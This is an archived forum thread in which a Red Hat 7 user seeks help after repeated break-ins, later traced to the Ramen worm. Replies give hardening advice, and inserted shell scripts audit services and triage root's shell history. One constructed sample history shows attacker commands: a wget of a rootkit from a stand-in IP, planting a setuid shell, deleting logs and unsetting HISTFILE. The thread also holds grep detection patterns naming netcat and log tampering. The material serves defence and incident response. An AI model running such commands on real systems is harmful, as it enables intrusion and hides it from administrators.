Help with the hackers....

SOLVED
Shannon Petry
Honored Contributor


I am having a world of trouble with RH Linux and hackers.
It started about 3 weeks ago. I got hacked into. The system was immediately wiped, disk formatted, etc.
Well, on Sunday I was hacked again. Last time I had NFS running, and found out the hard way that rpc.statd has many problems in Linux. Also, I was allowing ICMP through my router. Since the first hack, I have removed ICMP from the router, removed all NFS, all NIS, etc. The only things running were LPD, FTPD, HTTPD and telnetd. This is RH7. I also apply, at least weekly, all patches for security, and see what it got me?

Anyway, I am so used to SunOS and HP-UX being secure that I am really stumped as to how the dirtbags are getting in?

Input from pros is greatly appreciated!

Regards,
Shannon
Microsoft. When do you want a virus today?
13 REPLIES
Mike McKinlay
Honored Contributor

Re: Help with the hackers....

Check out "The Newbies Area" hacking webpage at

http://www.thenewbiesarea.f2s.com/texts.html

Another location suggested EEPROM on a network card could be hacked to provide continued access even after a formatted drive and reinstalled OS ... if possible, yuck!
"Hope springs eternal."
Shannon Petry
Honored Contributor

Re: Help with the hackers....

Unfortunately, this info is pretty basic. As mentioned, I have looked at the rpc.statd program and disabled it.

I also tested statdx against RH7 and could not get the root shell. I also tested some of the exploits I found for my version of wu-ftpd. Again, none of them work...

This is why I need some more advanced explanation of how the butt-plugs are getting in...


Shannon
Microsoft. When do you want a virus today?
AJ Hettema
Occasional Advisor

Re: Help with the hackers....

As far as I know, all the big distros have problems with security. They are not POSIX compliant and don't keep up with the FHS. That's the main reason. There's also the problem that they try to make Linux open for users who don't know anything about UNIX operating systems. Try www.linuxfromscratch.org. This is a page which lets you set up your own Linux box, and in the end you'll know what your box is doing and what software is running on it. It's also POSIX and FHS compliant.
Believe me! The secret of reaping the greatest fruitfulness and the greatest enjoyment of life is to live dangerously.
Mike McKinlay
Honored Contributor

Re: Help with the hackers....

Is there really a need to allow LPD and TELNETD ports open to the Internet? You don't mention SMTP ... what about that service?

If you're running a fairly simple website, you should only have 21, 80, and 443 (if you're using SSL) inbound open. Leaving telnet open to the Internet is just begging for people to try to force their way in.

I note that Red Hat 6.x had a management plug-in called Piranha that had a backdoor password implemented if you "install all" of the product. Would have thought that had been resolved with the 7.x release, but you never know.
"Hope springs eternal."

Re: Help with the hackers....


1. Disable all services you don't need in:
/etc/rc.d/rc3.d, /etc/rc.d/rc5.d
/etc/inetd.conf

2. Deny access from the Internet to services you don't need:
/etc/hosts.allow, /etc/hosts.deny

3. Check:
/etc/hosts.equiv, /root/.rhosts

4. Use ipchains to close all ports you don't need. Open only the ports and protocols you REALLY NEED.
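The four steps above, together with Mike McKinlay's point that a plain web server needs only 21, 80 and 443 reachable from outside, can be turned into something you can run. The script below is an added example, not code from the thread: it reads a constructed sample tree (a small inetd.conf, a runlevel directory, a "+ +" hosts.equiv) instead of the live /etc, and it prints the ipchains rules for review rather than executing them. The sample file contents, the port list and the directory layout are assumptions for the demonstration. One caveat worth adding: the original poster left lpd listening, and the Ramen worm that the thread later identifies was publicly documented at the time as also exploiting the LPRng lpd shipped with Red Hat 7.0, so lpd belongs behind the firewall along with telnet.

```shell
#!/bin/sh
# Added example (not code from the thread): audit what a Red Hat 7-era box
# exposes, and print a default-deny ipchains policy. The functions take
# paths so they can be pointed at the constructed sample tree below; on a
# real system pass / and /etc/inetd.conf. Nothing here changes the system:
# the ipchains commands are printed for review, not executed.

# Services inetd will start: every line that is not blank or a comment.
enabled_inetd_services() {
    # $1 = path to inetd.conf
    grep -v '^[[:space:]]*#' "$1" | awk 'NF { print $1 }'
}

# Init scripts started in a runlevel directory (the S* entries), with the
# sequence number stripped: S60lpd -> lpd. K* entries are stops, ignored.
enabled_rc_services() {
    # $1 = runlevel directory, e.g. /etc/rc.d/rc3.d
    ls "$1" 2>/dev/null | sed -n 's/^S[0-9][0-9]*//p' | sort -u
}

# List non-empty BSD trust files under $1; return 0 if any exist.
# A "+ +" line in hosts.equiv trusts every user on every host.
trust_files_present() {
    # $1 = root of the tree to inspect ("/" on a real system)
    found=1
    for f in "$1/etc/hosts.equiv" "$1/root/.rhosts"; do
        if [ -s "$f" ]; then
            echo "trust file present: $f"
            found=0
        fi
    done
    return $found
}

# Print an ipchains input policy: deny everything by default, accept only
# loopback, the listed inbound TCP ports, and non-SYN (reply) TCP packets;
# log whatever is dropped so the next probe shows up in syslog.
ipchains_policy() {
    # $@ = inbound TCP ports to keep open, e.g. 22 80 443
    echo "ipchains -P input DENY"
    echo "ipchains -F input"
    echo "ipchains -A input -i lo -j ACCEPT"
    for p in "$@"; do
        echo "ipchains -A input -p tcp --dport $p -j ACCEPT"
    done
    echo "ipchains -A input -p tcp ! -y -j ACCEPT"
    echo "ipchains -A input -l -j DENY"
}

# Constructed sample tree standing in for the poster's /etc and /root.
sample_root=$(mktemp -d)
mkdir -p "$sample_root/etc/rc.d/rc3.d" "$sample_root/root"
cat > "$sample_root/etc/inetd.conf" <<'EOF'
# constructed inetd.conf: ftp and telnet active, finger commented out
ftp     stream  tcp  nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp  nowait  root    /usr/sbin/tcpd  in.telnetd
#finger stream  tcp  nowait  nobody  /usr/sbin/tcpd  in.fingerd
EOF
touch "$sample_root/etc/rc.d/rc3.d/S60lpd" \
      "$sample_root/etc/rc.d/rc3.d/S85httpd" \
      "$sample_root/etc/rc.d/rc3.d/K35smb"
echo "+ +" > "$sample_root/etc/hosts.equiv"

echo "inetd services:";  enabled_inetd_services "$sample_root/etc/inetd.conf"
echo "rc3.d services:";  enabled_rc_services "$sample_root/etc/rc.d/rc3.d"
trust_files_present "$sample_root" || echo "no trust files"
echo "proposed firewall:"; ipchains_policy 22 80 443
```

Anything that prints under "inetd services" or "rc3.d services" and is not on your short list of Internet-facing daemons is a candidate for step 1. The printed policy only lets replies through for TCP; if the box resolves names against an outside DNS server you also need a rule for UDP replies to port 53 before you load it, or you will lock yourself out of name resolution.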
Bill_6
Advisor

Re: Help with the hackers....

One of the quickest ways to secure the box would be to use Bastille on it, http://bastille-linux.sourceforge.net/ it's specifically designed to harden Red Hat installs.

The best way to help prevent problems is to find them first yourself, a few ways to do that are:

nmap http://www.insecure.org/nmap/
dsniff http://www.monkey.org/~dugsong/dsniff/
tcpdump http://ee.lbl.gov/

Unfortunately, intrusion detection is as much an art as it is a science, so there's really no quick way to learn it, regardless of what sales reps may tell you :-)

btw, they're called crackers, not hackers; there IS a difference.

HTH
There's nothing fdisk can't fix
Steve Whitaker
Occasional Visitor

Re: Help with the hackers....

A couple of clues may give you the reason for the hacks. The first thing I would check is root's .bash_history. This will show you what the hacker is doing, and will separate the experienced cracker from a script kiddie.

Also, make sure Anonymous FTP is turned off and/or the latest update for wu-ftpd is installed. For greater protection, you may want to invest in ProFTPD.

Install SSH and turn off telnet in inetd.conf...many telnet hacks out there.

Kill any r-anything BSD services. If you are on the Internet, you do not want these programs running.

Unfortunately, cheap bandwidth has made finding and cracking computers easier for kids who want to impress their friends by setting up IRC floods and DDoS attacks. Make sure you run NMAP on the machine and only have httpd and ssh running to the outside. Anything else, you will need to proceed with caution.

Good luck!

Steve
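A first pass at the .bash_history check Steve describes, as an added example that is not part of the thread. The history file it reads is constructed to look like a script-kiddie session (fetch a kit, build it, plant a setuid shell, wipe logs, disable history); the patterns and the 192.0.2.10 address are assumptions for the demonstration. The point the original post does not spell out is that the history is only useful if it is still there: a cleaned-up box often has .bash_history deleted, emptied, or symlinked to /dev/null, which is itself a finding.

```shell
#!/bin/sh
# Added example (not code from the thread): first-pass triage of root's
# shell history on a compromised box. The history file below is
# constructed. Work from a copy taken off the disk image, not the live
# file: the attacker may still be logged in, and a live shell rewrites
# .bash_history on exit.

# Is the history file trustworthy at all? Intruders commonly delete it,
# truncate it, or replace it with a symlink to /dev/null so nothing is kept.
history_file_status() {
    # $1 = path to .bash_history
    if [ -L "$1" ]; then
        echo "symlink -> $(readlink "$1")"
    elif [ ! -e "$1" ]; then
        echo "missing"
    elif [ ! -s "$1" ]; then
        echo "empty"
    else
        echo "ok"
    fi
}

# Lines typical of post-compromise activity, with line numbers so they can
# be read in sequence: fetching a kit, building it, planting a setuid shell,
# adding accounts, touching logs or login records, and disabling history.
suspicious_history_lines() {
    # $1 = path to .bash_history
    grep -n -E -i \
        -e '\b(wget|curl|ftp|ncftp|tftp|lynx)\b' \
        -e '\b(gcc|cc|make)\b' \
        -e '\b(useradd|adduser|passwd)\b' \
        -e '/var/log/|utmp|wtmp|lastlog' \
        -e '\bchattr\b|chmod [1-7][0-7]{3}' \
        -e 'HISTFILE|history -c|\.bash_history' \
        -e '\bnc\b|netcat' \
        "$1"
}

# Constructed sample: what root's history looks like after a kiddie visit.
hist_dir=$(mktemp -d)
hist="$hist_dir/.bash_history"
cat > "$hist" <<'EOF'
cd /tmp
ls -la
wget http://192.0.2.10/rk.tgz
tar xzf rk.tgz
cd rk && make
./install
cp /bin/sh /tmp/.x/sh; chmod 4755 /tmp/.x/sh
rm -f /var/log/messages /var/log/secure
unset HISTFILE
EOF
# And the other common outcome: history pointed at /dev/null.
ln -s /dev/null "$hist_dir/nulled_history"

echo "history file: $(history_file_status "$hist")"
suspicious_history_lines "$hist"
echo "nulled copy: $(history_file_status "$hist_dir/nulled_history")"
```

Read the flagged lines in order rather than in isolation: a wget followed by make and a chmod 4755 in /tmp is a rootkit install, and the log removal and "unset HISTFILE" at the end tell you the history stops there, not that the attacker did. Run the same check on every account with a shell, not just root, since the first foothold is usually an unprivileged one.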
Albert E. Whale, CISSP
Honored Contributor

Re: Help with the hackers....

Shannon,

Just got hacked as well... remove wu-ftpd 2.6.0 from your server; this is the method of attack.

Hope that helps.
Sr. Systems Consultant @ ABS Computer Technology, Inc. http://www.abs-comptech.com/aewhale.html & http://www.ancegroup.com
Bill_6
Advisor

Re: Help with the hackers....

I'd be willing to bet these are all related to the Ramen worm, http://xforce.iss.net/alerts/advise71.php, since wu-ftpd is being mentioned. Now would be a good time to go to ProFTPD, http://www.proftpd.net/, if the service is needed.

I'd also bet money that we'll see other variations that aren't specifically targeting Red Hat systems in the near future.
There's nothing fdisk can't fix
Shannon Petry
Honored Contributor

Re: Help with the hackers....

Bill, you hit the bullseye. I have not had much time to look at the hacked system, but RAMEN is definitely the cause, by the documentation.
Strange, though, that wu-ftpd was patched with the latest from Red Hat, and rpc.statd was disabled....
I'll be looking at ProFTPD, and perhaps, if that fails, just compiling wu-ftpd from source.

Last question is: how (since Red Hat does not notify) do I find out about these exploits before I am hacked?
This is twice I have had to dig into getting hacked and find info in areas other than RH.

Thanks for most of your input!
Shannon
Microsoft. When do you want a virus today?
Bill_6
Advisor
Solution

Re: Help with the hackers....

Glad I could help, Shannon. I don't use Red Hat, so I'm not familiar with how they do things in their distro. I do know that they try to be on the bleeding edge, though, so that may account for some of the problems they have as far as security and stability are concerned. They also have a history of their x.0 releases having problems.

Unfortunately, there isn't one all-encompassing security site that I have found. I find that browsing the commercial/government sites as well as the "hacker" sites is about the best compromise. I also keep an eye on alt.os.linux.security, since it's active 24/7 with people from around the world posting. Here are some of my main security bookmarks.

http://www.attrition.org/
http://www.sans.org/newlook/home.htm
http://securityportal.com/
http://www.securityfocus.com/
http://www.infowar.com/
http://www.cert.mil/
http://rootshell.com/beta/news.html
http://www.infosyssec.org/
http://xforce.iss.net/

There's nothing fdisk can't fix
Bill_6
Advisor

Re: Help with the hackers....

oh, I forgot http://www.linux-firewall-tools.com/linux/ as well.
There's nothing fdisk can't fix